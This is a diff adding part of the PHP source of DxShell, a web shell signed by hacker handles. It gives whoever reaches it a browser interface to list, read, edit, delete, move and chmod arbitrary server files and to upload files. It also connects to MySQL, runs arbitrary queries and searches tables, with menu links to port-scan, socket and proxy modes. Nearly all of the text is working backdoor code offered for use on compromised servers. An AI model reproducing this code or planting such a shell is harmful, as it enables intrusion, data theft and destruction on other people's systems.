+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 244-648';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ#244648",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
